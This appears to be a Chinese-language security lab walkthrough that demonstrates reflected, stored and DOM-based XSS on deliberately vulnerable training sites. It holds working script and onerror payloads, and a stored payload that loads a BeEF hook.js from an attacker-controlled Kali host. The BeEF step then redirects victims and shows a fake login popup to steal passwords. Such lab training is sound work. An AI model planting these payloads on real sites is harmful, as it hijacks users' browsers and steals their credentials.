1.反射型XSS
(1)正常访问http://192.168.4.130/xss/01.php?name=iwebsec
(2)反射型XSS测试语句
http://192.168.4.130/xss/01.php?name=<script>alert('ctfs')</script>
2.存储型XSS
访问:http://192.168.4.130/xss/02.php
(1)
输入你的留言信息:ctfs
(2)
输入你的留言信息:
<script>alert(/ctfs/)</script>
3. DOM型XSS
(3)
输入内容:ctfs0.
(4)
输入内容: <img src=1
onerror=alert(/ctfs/) />
4. XSS漏洞利用
(1)在页面上输入http://127.0.0.1/pikachu/,进入到pikachu的网站界面。192.168.4.130/pikachu/
2、在站点上进行各种各样的篡改页面gj
2.1、打开之前搭建好的pikachu站点,然后在XSS留言板的界面输入XSS JavaScript的命令:<script src=http://Kali IP地址:3000/hook.js></script>,脚本的意思是将站点需要的内容输入到hook.js文件,然后在hook.js实现gj,点击提交,此时模仿的是gj者将gj脚本放在了留言板上,一旦有用户阅览该留言板就会执行该XSS JavaScriptgj脚本,从而被beef-xss软件控制。
(2)此时模仿用户登录了该留言板的界面,阅读了该留言板的内容。
(3)此时gj者在beef-xss平台上就收到了刚刚阅读用户的信息。
(4)接下来就开始实施篡改页面gj,首先是对用户的页面进行重定向,我们点击Browser—>Hooked Domain —>Redirect Browser,然后输入https://www.baidu.com,然后点击右下角的Execute,然后用户的浏览器的该页面就会跳转到百度的页面了。
(5)接下来进行社工弹窗gj,我们点击Social Engiineering——>Pretty Theft ,然后右上角选择弹窗的类型,右下角点击 Execute,可以在浏览器弹出账户登录过期的显示,然后要求账户重新输入账户密码。
(6)然后浏览器那边就会弹出框,用户就有可能在弹框中输入账号密码。
(7)如果用户输入了用户名和密码,点击了Log in的话,黑客在beef后台就会获取到账户刚刚输入的账号密码。
3、(附加题)在beef软件上尝试更多篡改页面的gj。